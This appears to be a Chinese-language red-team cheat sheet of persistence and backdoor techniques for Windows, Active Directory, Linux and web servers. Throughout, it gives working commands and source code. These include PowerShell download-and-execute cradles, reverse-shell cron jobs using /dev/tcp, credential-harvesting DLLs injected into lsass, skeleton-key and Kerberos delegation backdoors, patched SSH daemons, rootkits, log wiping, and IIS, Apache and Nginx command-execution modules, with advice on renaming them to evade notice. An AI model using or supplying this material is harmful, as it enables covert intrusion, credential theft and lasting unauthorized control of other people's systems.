>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegRun -Verbose -Name Update -Command 'c:\windows\temp\Update.exe' -Instance "zone.com\sub2k8""重启MSSQL上线(需重启服务)http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1>powershell -ep bypass >IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1') >Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "zone.com\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 远程木马脚本可用CS/Empire生成>net stop mssqlserver>net start mssqlserver映像劫持>powershell -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegDebugger -Verbose -FileName sethc.exe -Command "c:\windows\system32\cmd.exe" -Instance "zone.com\sub2k8""DDL事件触发>powershell -exec bypass >IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/Invoke-SqlServer-Persist-TriggerDDL.psm1') >Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')"  远程木马文件可用CS/Empire生成>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance " zone\sub2k8" -Remove   移除后门

NSSM

http://www.nssm.cc/release/nssm-2.24.zipNSSM封装可执行程序为系统服务>nssm install 服务名称会自动弹出设置


Path选择powershell的路径,arguments直接输入参数。
启动服务
>nssm start 服务名称

会上线

重启电脑,权限也会维持
删除服务
>nssm remove <servicename>


添加签名

https://github.com/secretsquirrel/SigThief>python sigthief.py -i 被窃取的文件 -t 要添加签名的恶意文件 -o 保存文件>python sigthief.py -i rarext.dll -t rarextdwa.dll -o 1.dll

Metsvc

Meterpreter> run metsvc -A在C:Windows\TEMP下随机生成目录三个文件,创建服务metsvc 31337端口连接后门Msf>use exploit/multi/handlerMsf>set payload windows/metsvc_bind_tcpMsf>set rhost 192.168.1.2Msf>set rport 31337Msf>run删除服务Meterpreter > run metsvc –r


Persistence

Meterpreter>run persistence -X -i 10 -r 192.168.1.9 -p 4444-X系统启动时运行-i每隔10秒尝试连接服务端连接后门Msf>use exploit/multi/handlerMsf>set payload windows/meterpreter/reverse_tcpMsf>set lhost 192.168.1.1Msf>set lport 4444Msf>run


HookPasswordChangeNotify

使用VS2015开发环境,MFC设置为在静态库中使用MFC编译工程,生成HookPasswordChange.dllhttps://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1在代码尾部添加如下代码:>Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass并命名为HookPasswordChangeNotify.ps1上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll管理员权限执行>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1C:\Windows\Temp下可以找到passwords.txt&https://gitee.com/RichChigga/PasswordchangeNotify上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll 管理员权限执行:>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1在C:\Windows\System32 新建文件system.ini第一行是连接的ip 第二行是端口



Password Filter DLL

https://github.com/3gstudent/PasswordFiltervisualstudio生成解决方案DLL放在%windir%\system32\下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa下的Notification Packages,添加Win32Project3

>REG QUERY "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages">REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0rassfm\0Win32Project3" /f重启之后只要修改用户的密码,即可记录


文件默认在C盘根目录,可在源码中修改


WMIC事件订阅

每隔30秒加载一次payload>wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'">wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23",CommandLineTemplate="远程调用(powershell,regsvr32,mshta等)">wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""

重启维持
卸载后门
>Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose>Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose>Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

WMI-Persistence

https://gitee.com/RichChigga/WMI-Persistencecobalt strike ->payload generator->powershell(use x64)


attack->文件下载,文件选择payload generator的脚本,local uri为随意文件

生成后地址替换进WMI-Persistence脚本内

# powershell -exec bypassPS > Import-Module .\WMI-Persistence.ps1PS > Install-Persistence


PS > Check-WMI  重启后即可上线system权限(要等待4-6分钟)

自定义上线

attack->文件下载,exe木马指定为文件。local uri为随意文件,wmi.xsl放在web目录

修改wmi.xsl
<?xml version='1.0'?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0"><output method="text"/>    <ms:script implements-prefix="user" language="JScript">    <![CDATA[    var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://192.168.0.107/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://192.168.0.107/load.jpg delete",0);    ]]> </ms:script></stylesheet>

WMI-Persistence脚本修改payload地址为wmi.xsl$finalPayload=" wmic os get /FORMAT:`"$Payload`""


>powershell -exec bypassPS > Import-Module .\WMI-Persistence.ps1PS > Install-PersistencePS > Check-WMIPS > Remove-Persistence 删除模块重启后即可上线



Invoke-Tasksbackdoor

>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method nccat -ip 192.168.0.103 -port 9999 -time 2"> powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 192.168.0.103 -port 8081 -time 2"


Invoke-ADSBackdoor

使用ADS创建一个隐藏文件,创建一个计划任务每隔一分钟请求一次攻击。>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Backdoors/Invoke-ADSBackdoor.ps1'); Invoke-ADSBackdoor -PayloadURL http://192.168.0.107/ps/Schtasks-Backdoor.ps1 -Arguments 'Invoke-Tasksbackdoor -method nccat -ip 192.168.0.107 -port 12138 -time 1'"

生成 >msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.107 LPORT=12138 -f powershell -o /var/www/html/ads #use exploit/multi/handler #set payload windows/x64/meterpreter/reverse_https #run


ADS隐藏webshell

指定宿主文件,index.php是网页正常文件>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg<?php include(‘index.php:hidden.jpg’)?><?php $a="696E6465782E7068703"."A68696464656E2E6A7067";#hex编码$b="a";include(PACK('H*',$$b))?>>echo 9527 > 1.txt:flag.txt>notepad 1.txt:flag.txt或不指定宿主文件>echo hide > :key.txt>cd ../>notepad test:key.txt

上传处绕过

上传的文件名服务器表面现象生成的文件内容
test.php:a.jpg生成test.php
test.php::$DATA生成test.php
test.php::$INDEX_ALLOCATION生成test.php文件夹\
test.php::$DATA\0.jpg生成0.jpg

ADS&JavaScript

创建一个txt文件,test.txt,随便添加内容(实际的工具,即用户要用的那个工具)。将程序写入文件流(此处用calc.exe)>type calc.exe > test.txt:calc.exe使用mklink创建文件链接:>mklink config.txt test.txt:calc.exe创建readme.txt,文件内容随便。设置为隐藏。创建readme.js,内容如下:var objShell = new ActiveXObject("shell.application");objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);objShell.ShellExecute("README.txt", "", "", "open", 1);执行readme.js,运行calc.exe ,打开readme.txt

Empire

LNK后门

EmpireEmpire> set Host http://192.168.1.150Empire> set Port 8080>launcher powershell Listener's Name生成后只使用Base64的代码。>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -EncScript Base64编码"


清除后门
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -CleanUp"


WMI

Empire>powershell/persistence/elevated/wmi

注入SSP被动收集密码

需高权限

Mimikatz

重启失效>privilege::debug>misc::memssp锁屏>rundll32.exe user32.dll,LockWorkStation


登录的账号密码保存在
C:\Windows\System32\mimilsa.log

重启有效
将mimikatz中的mimilib.dll放入system32目录>reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 查看注册表>reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ  添加mimilib

有账号登录密码保存在C:\Windows\System32\kiwissp.log重启也有效


Empire

复制mimilib.dll到system32文件夹中>shell copy mimilib.dll C:\Windows\System32\使用模块>usemodule persistence/misc/install_ssp*>set Path C:\Users\Administrator\mimilib.dll

Powersploit

>Import-Module .\PowerSploit.psm1>Install-SSP -Path .\mimilib.dll


基于域策略文件权限后门

域的组策略和脚本存放在域控机的C:\Windows\SYSVOL\sysvol\zone.com\Policies目录,域内机器定时访问以更新策略域控机设置policies为everyone完全控制>cacls C:\Windows\SYSVOL\sysvol\zone.com\Policies /e /t /c /g "EveryOne":f

使用powerview查询域内机对应策略文件
PS> Get-NETGPO -ComputerName sub2k8.zone.com |fl gpcfilesyspath打开C:\Windows\SYSVOL\sysvol\zone.com\Policies\{id}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf末尾添加[Registry Values] MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,c:\windows\system32\calc.exe [Version] signature="$CHICAGO$" Revision=1手动刷新策略>gpupdate /force劫持taskhost.exe,可替换c:\windows\system32\calc.exe为后门文件或语句。

Kerberoasting后门

当有setspn权限时,为域用户添加一个SPN
>setspn -U -A RDP/zone.com godadmin

域内任何主机可以使用Kerberoast 获得TGS
https://github.com/malachitheninja/Invoke-Kerberoast

>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt

或使用rubeus.exe

破解
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt

S4U2Self后门

域控执行,寻找具备SPN且密码永不过期的账户
>Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires| ? {($_.ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}

使用mimikatz的dcsync提取用户hash
>lsadump::dcsync /domain:zone.com /user:y


布置后门
>Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount 账户

布置完成后利用,登录账户y
触发后门
>Rubeus.exe s4u /user:y /aes256:{aes256} /domain:zone.com /msdsspn:krbtgt /impersonateuser:godadmin

注入票据,获取域控的CIFS、LDAP服务
>Rubeus.exe asktgs /ticket:{} /service:cifs/dc.zone.com,ldap/dc.zone.com /ptt


受限委派后门

http://192.168.0.107/ps/nishang/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1新增一个受限委派服务账户,或添加受限委派后门功能给一个已知账户密码存在的服务账户。需运行在域控制器上,本次演示的是新建后门账户,若是给已知账户密码的服务账户添加功能,步骤一致。PS > Add-ConstrainedDelegationBackdoor -SamAccountName backdoor -Domain zone.com -AllowedToDelegateTo ldap/dc.zone.com密码默认为Password@123!可以修改脚本中$Password参数修改密码。


https://github.com/samratashok/ADModule导入ADModule中的Microsoft.ActiveDirectory.Management.dll和Import-ActiveDirectory.ps1>Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose>Import-Module Import-ActiveDirectory.ps1现以域内普通用户y登录一台域内机器sub2k8,使用kekeo获取TGTKekeo#tgt::ask /user:backdoor /domain:zone.com /password:Passowrd@123!

Kekeo#tgs::s4u /tgt:TGT_backdoor@ZONE.COM_krbtgt~zone.com@ZONE.COM.kirbi /user:godadmin@zone.com /service:ldap/dc.zone.com获取以域管理身份访问ldap的TGS 

使用mimikatz写入TGS票据
mimikatz#kerberos::ptt C:\Users\y.ZONE\Desktop\kekeo\x64\TGS_godadmin@zone.com@ZONE.COM_ldap~dc.zone.com@ZONE.COM.kirbi

接下来就可以dcsync导出krbtgt的hash,通过krbtgt伪造黄金票据
mimikatz#lsadump::dcsync /user:krbtgt /domain:zone.com


Skeleton Key万能钥匙

域控上使用mimikatz执行
>privilege::debug>misc::skeleton


可以使用域内任何账号以密码mimikatz登录任意域内主机
使用Empire模块
>usemodule persistence/misc/skeleton_key*绕过LSA Protection>privilege::debug>!+>!processprotect /process:lsass.exe /remove>misc::skeleton


唯一IP访问

>msfvenom -p windows/shell_hidden_bind_tcp LPORT=443 AHOST=192.168.0.107 -f exe > svchost.exe只有当107这台机器连接时可获得shell,其他机器不可以。



Linux cron后门

>msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.107 LPORT=12138 -f raw > /var/www/html/shell.sh(crontab -l;printf "*/1 * * * * /bin/bash /tmp/shell.sh;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

#!bash(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

Strace记录ssh密码

安装strace#apt-get install strace#vi ~/.bashrc添加alias ssh='strace -o /tmp/.log -e read,write,connect -s 2048 ssh'

SSHD后门

>ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;执行后开启31337端口,使用root任意密码登录>ssh root@192.168.1.1 -p 31337

进程注入

http://cymothoa.sourceforge.net/靶机>./cymothoa -p 进程PID -s 1 -y 端口攻击机>nc -vv ip 端口


SSH wrapper后门

#cd /usr/sbin#mv sshd ../bin#echo '#!/usr/bin/perl' >sshd#echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd#echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd#chmod u+x sshd#/etc/init.d/sshd restart攻击机执行>socat STDIO TCP4:192.168.0.110:22,sourceport=13377



SUID Shell

>cp /bin/bash /tmp/tmp>chmod u+s /tmp/tmp>/tmp/tmp -p


SSH公私钥登录

>vim /etc/ssh/sshd_conf取消以下注释

>ssh-keygen生成复制/root/.ssh/id_rsa.pub文件到攻击端的/root/.ssh/authorized_keys>ssh -i id_rsa targer@1.1.1.1


Reptile

https://github.com/f0rb1dd3n/Reptile安装>apt install build-essential libncurses-dev linux-headers-$(uname -r)>git clone https://github.com/f0rb1dd3n/Reptile.git

Kbeast_rootkit

http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gzversion - 0 : 2.6.18 (RHEL/CentOS 5.x)        1 : 2.6.32 (Ubuntu 10.x) [default version]修改配置config.h安装路径、日志路径、端口、连接密码、连接用户


./setup build攻击机连接>telnet 192.168.1.1 13377


OpenSSH后门

下载http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gzhttp://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz备份配置文件>mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old>mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old安装关联文件centos>yum install -y openssl openssl-devel pam-devel zlib zlib-develUbuntu>apt-get install -y openssl libssl-dev libpam0g-dev>tar zxvf openssh-5.9p1.tar.gz >tar zxvf 0x06-openssh-5.9p1.patch.tar.gz >cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/>cd openssh-5.9p1>patch <sshbd5.9p1.diff>vim includes.h

/tmp/ilog记录登录到本机的用户密码
/tmp/olog记录本机登录其他机器的账户密码
日志文件前可以加个.隐藏起来
SECRETPW是连接后门密码
查看当前版本
>ssh -V

修改version.h改为当前版本

编译安装
Centos7>./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5>make clean>make && make install>systemctl restart sshd.serviceubuntu>./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam>make clean>make&&make install重启服务,修改文件日志>touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config>touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config



清除痕迹
>export HISTFILE=/dev/null>export HISTSIZE=0>export HISTFILESIZE=0>sed -i 's/192.168.0.1/127.0.0.1/g' /root/.bash_history

IPTables端口复用

>iptables -t nat -N LETMEIN >iptables -t nat  -A LETMEIN -p tcp -j REDIRECT --to-port 22# 开启开关>iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT# 关闭开关>iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT>iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN攻击端:#开启复用>echo threathuntercoming | socat - tcp:192.168.0.110:80#ssh使用80端口进行登录ssh -p 80 root@192.168.0.110#关闭复用echo threathunterleaving | socat - tcp:192.168.0.110:80


文件处理

>chattr +I shell.sh

>vim .shell.sh

>attrib +s +h +r 1.txt

>touch -r 1.file 2.file 修改2file文件的时间跟1file时间相同


IIS_Bin_Backdoor

From:https://github.com/WBGlIl/IIS_backdoorIIS_backdoor_dll.dl放入 web 目录的 bin 文件夹中配置 web.config 文件
<?xml version="1.0" encoding="UTF-8"?><configuration> <system.webServer> <modules> <add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" /> </modules> </system.webServer></configuration>IIS_backdoor_shell.exe执行命令

使用IISBackdoor太明显,容易被看出是后门,这里对后门改名


重新生成解决方案,dll放入bin目录,web.config修改为
<?xml version="1.0" encoding="UTF-8"?><configuration>    <system.webServer>        <modules>          <add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />        </modules>    </system.webServer></configuration>


添加完之后会自动在模块中注册好

执行payload,msf生成raw格式payload,选择shellcode选项,raw文件拖入即可>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw


IIS_NETDLL_Spy

From:https://github.com/Ivan1ee/NetDLLSpy原作者提及三种方式,第一种编译代码为DLL新建aspx文件实例化后门类来执行命令,第二种是做httphandler映射可指定一个后缀执行命令保存文件在web服务器上,再读取结果。第三种是使用jsc.exe编译js脚本生成dll,添加映射菜刀连接。这里根据原作者的代码,进行了一下简单的修改,修改后的功能为添加httphandler映射指定一个后缀执行命令显示在页面上,不用保存在服务器中再访问。代码
using System;using System.Diagnostics;using System.IO;using System.Text;using System.Web;namespace IsapiModules{ public class Handler : IHttpHandler { public bool IsReusable { get { return false; } } public void ProcessRequest(HttpContext context) { string input = context.Request.Form["InternetInformationService"]; //command if (context.Request.Form["microsoft"] == "iis")//do command { this.cmdShell(input); } } public void cmdShell(string input) { Process process = new Process(); process.StartInfo.FileName = "cmd.exe"; process.StartInfo.RedirectStandardOutput = true; process.StartInfo.UseShellExecute = false; process.StartInfo.Arguments = "/c " + input; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.Start(); StreamReader output = process.StandardOutput; String result = output.ReadToEnd(); output.Close(); output.Dispose(); HttpContext.Current.Response.Write(result); } }}

保存为随意后缀,使用csc编译。
>C:\Windows\Microsoft.NET\Framework\v2.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs

Web.config文件添加
<system.webServer>  <handlers>     <add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" />   </handlers> </system.webServer>



打开IIS管理器,可以看到处理映射管理器中已经添加了模块。


现在随意访问个xxx后缀的文件


带参数访问
microsoft=iis&InternetInformationService=net user

第三种连接菜刀,这里也对代码修改了一下。
import System; import System.Web; import System.IO; package IsapiModule{   public class Handler implements IHttpHandler{     function IHttpHandler.ProcessRequest(context : HttpContext){       context.Response.Write("404 Not Found")       var I = context;       var Request = I.Request;       var Response = I.Response;       var Server = I.Server;       eval(context.Request["Internet"]); //pass    }     function get IHttpHandler.IsReusable() : Boolean{ return true}  }}使用jsc编译>C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js


编辑web.config,添加映射,这里指定的后缀是.iis<system.webServer> <modules runAllManagedModulesForAllRequests="true"/> <directoryBrowse enabled="true"/><staticContent> <mimeMap fileExtension=".json" mimeType="application/json" />  </staticContent> <handlers> <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode"/> </handlers></system.webServer>已自动加入了映射。现在随便访问个iis后缀的文件。



可使用菜刀直接连接


IIS_RAID

From:https://github.com/0x09AL/IIS-Raid在vs2019下编译Functions.h中修改连接密码,passfile是dump下来的密码保存的位置,com_header是后门和服务器通信的请求头。

打开项目修改完你的密码,直接ctrl+B生成解决方案即可(这里生成的是release版本)
Dll传到服务器,改个名字,执行添加模块
>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true

在模块中可以看到已经存在了

远程连接
>python3 iis_controller.py --url http://192.168.0.98 --password thisismykey执行命令的方式是>cmd +命令


Dump命令可以dump下来IIS站点的登录的信息,保存在设置的位置。
Inject可以执行shellcode
Cs/msf生成raw格式的shellcode
>inject 位置


JAVA Web Backdoor

From:https://www.freebuf.com/articles/web/172753.htmlhttps://github.com/rebeyond/memShell当获取一个webshell或bashshell权限时,下载后门执行注入进程形成无文件复活后门下载后解压到任意web目录

得到2个jar文件
执行,password设置为你的密码
>java -jar inject.jar password

注入成功,在web任意页面任意url执行命令
http://192.168.0.121:8080/css/app.css?pass_the_world=password

可执行命令,反弹shell,上传/下载文件,列目录,读文件,添加代理,连接菜刀


Tomcat JSP HideShell

From:https://mp.weixin.qq.com/s/7b3Fyu_K6ZRgKlp6RkdYoAhttps://github.com/QAX-A-Team/HideShell把自己的shell和hideshell传入靶机,先访问自己的shell,目的是为了让 Tomcat 将它编译,并生成 JspServletWrapper 保存在 JspRuntimeContext 中。

再访问hideshell.jsp,点击hide你的shell。

已经隐藏了


再访问hideshell.jsp,可以看到隐藏后的shell的文件名。

访问看看


当然,也可以把hideshell自身隐藏了,那访问它的方式就是hidden-hideshell.jsp

目录里啥都没了

此方式隐藏之后请求不会产生日志

那如果把shelltest文件夹删掉权限还会在吗?

是在的


Apache Module后门1

From:https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor生成模板结构>apxs -g -n auth


编辑mod_auth.c文件
#include "httpd.h"#include "http_config.h"#include "http_protocol.h"#include "ap_config.h"#include <stdio.h>#include <stdlib.h>static int auth_handler(request_rec *r){    const apr_array_header_t    *fields;    int                            i;    apr_table_entry_t           *e = 0;    char FLAG = 0;    fields = apr_table_elts(r->headers_in);    e = (apr_table_entry_t *) fields->elts;    for(i = 0; i < fields->nelts; i++) {        if(strcmp(e[i].key, "Authorizations") == 0){            FLAG = 1;            break;        }    }    if (FLAG){        char * command = e[i].val;        FILE* fp = popen(command,"r");        char buffer[0x100] = {0};        int counter = 1;        while(counter){            counter = fread(buffer, 1, sizeof(buffer), fp);            ap_rwrite(buffer, counter, r);        }        pclose(fp);        return DONE;    }    return DECLINED;}static void auth_register_hooks(apr_pool_t *p){    ap_hook_handler(auth_handler, NULL, NULL, APR_HOOK_MIDDLE);}module AP_MODULE_DECLARE_DATA auth_module = {    STANDARD20_MODULE_STUFF,     NULL,                  /* create per-dir    config structures */    NULL,                  /* merge  per-dir    config structures */    NULL,                  /* create per-server config structures */    NULL,                  /* merge  per-server config structures */    NULL,                  /* table of config file commands       */    auth_register_hooks  /* register hooks                      */};编译后重启apache>apxs -i -a -c mod_auth.c && service apache2 restart


原文件接受的头是backdoor太明显,这里换成了Authorizations

或使用python来执行

#!/usr/bin/env python# -*- coding: utf-8 -*-import requestsimport sysdef exploit(host, port, command):    headers = {        "Authorizations": command    }    url = "http://%s:%d/" % (host, port)    response = requests.get(url, headers=headers)    content = response.content    print contentdef main():    if len(sys.argv) != 3:        print "Usage : "        print "\tpython %s [HOST] [PORT]" % (sys.argv[0])        exit(1)    host = sys.argv[1]    port = int(sys.argv[2])    while True:        command = raw_input("$ ")        if command == "exit":            break        exploit(host, port, command)if __name__ == "__main__":    main()Apache Module后门2From:https://github.com/VladRico/apache2_BackdoorMod.load文件传入/etc/apache2/mods-available/目录,.so文件传入/usr/lib/apache2/modules/目录启动后门模块,重启apache>a2enmod backdoor&service apache2 restart

Cookie里添加字段password=backdoor
访问http://ip/ping返回如下图说明后门正常允许

访问http://ip/bind/12345 开启正向连接,攻击机执行nc ip 12345即可

访问http://ip/revtty/192.168.0.107/12138 开启反向连接,攻击机109执行nc监听12138即可

访问http://ip/proxy/1337开启socks代理

想要结束socks代理可执行
>echo "imdonewithyou" |nc 192.168.0.111 1337

即可结束socks代理
以上原作者的文件命名backdoor太明显,可以自己修改文件重新编译
创建模板结构命名为phpmodev


修改cookie内容为迷惑字段Authorizations=PHPSESSIONID


Apache Module后门3

From: https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247491179&idx=1&sn=ab26fe36ac74f5b140e91279ae8018c7生成模板结构>apxs -g -n phpdevmod


编辑mod_phpdevmod.c文件
编译
>make -e CC=x86_64-linux-gnu-g++

生成的.so文件在/.libs目录下

将其复制到/usr/lib/apache2/modules/目录
修改/etc/apache2/mods-enabled/php7.0.load文件,添加如下LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so<Location /qq.jpg>    #可以设置为任何不存在的文件  setHandler phpdevmod</Location>


需重启apache服务
访问后门方式http://ip/qq.jpg?命令的url编码
直接访问后门文件

636174202F6574632F706173737764为cat /etc/passwd的url编码


Nginx Lua后门


From:https://github.com/netxfly/nginx_lua_security
https://github.com/Y4er/Y4er.com/blob/251d88d8a3cf21e9bafe15c43d7900ffeacfa7ea/content/post/nginx-lua-backdoor.md
后门利用的前提是获取到root权限,nginx安装有lua模块。
在nginx.conf中http节处添加,指定lua脚本位置,以及nginx启动时加载的脚本

在lua目录/waf/中新建Init.lua,内容如下,require nginx表示加载nginx.lua中的模块。

/waf/目录中新建nginx.lua实现执行命令,参数为waf。

在nginx配置文件中加入location。

效果:


PwnNginx

From:https://github.com/t57root/pwnginx解压好后编译客户端>make

编辑nginx的源文件/src/core/nginx.c找到configure arguments:在后面添加--prefix=/usr/local/nginx\n指定的是nginx安装的目录


重新编译nginx添加后门模块
>./configure --prefix=/usr/local/nginx/ --add-module=/tmp/pwnginx-master/module

>make

覆盖新的nginx到原nginx目录
>cp -f objs/nginx /usr/local/nginx/sbin/nginx

重启nginx
>killall nginx&/usr/local/nginx/sbin/nginx连接>./pwnginx shell 目标机 nginx端口 密码默认密码是t57root,密码的配置文件在pwnginx-master\module\config.h文件夹中,可在重新编译nginx前修改密码


此后门也可开启socks隧道

红队tips

父进程破坏

命令explorer.exe / root与cmd.exe / c类似,只不过使用explorer会破坏进程树,会创建新实例explorer.exe,使之成为新实例下的子进程


loT高频率账户密码


Bypass mod_security

Xss和注入bypass mod_security/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... –<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5%75%6e%69on = union %73%65%6cect = select %75%6e%69 = uni = url encode %73%65%6c = sel = url encode

查找git和svn的字典


Top 25 重定向dorks


使用grep快速去除垃圾数据

curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*

已泄露的密码整理出的字典

https://github.com/FlameOfIgnis/Pwdb-Public从网上泄露的10亿条数据中整理出的。里面257,669,588被筛选为损坏的数据或测试账户。10亿个凭据可归结为168,919,919密码和393,386,953用户名.平均密码长度为9.4822个字符12.04%包含特殊字符,28.79%密码仅是字母,26.16%仅是小写,13.37%仅是数字,8.83%的密码仅被发现一次与rockyou的对比,rockyou包含14,344,391个密码,本字典与rockyou相差80%还有根据不同国家生成的小字典

命令注入Bypass

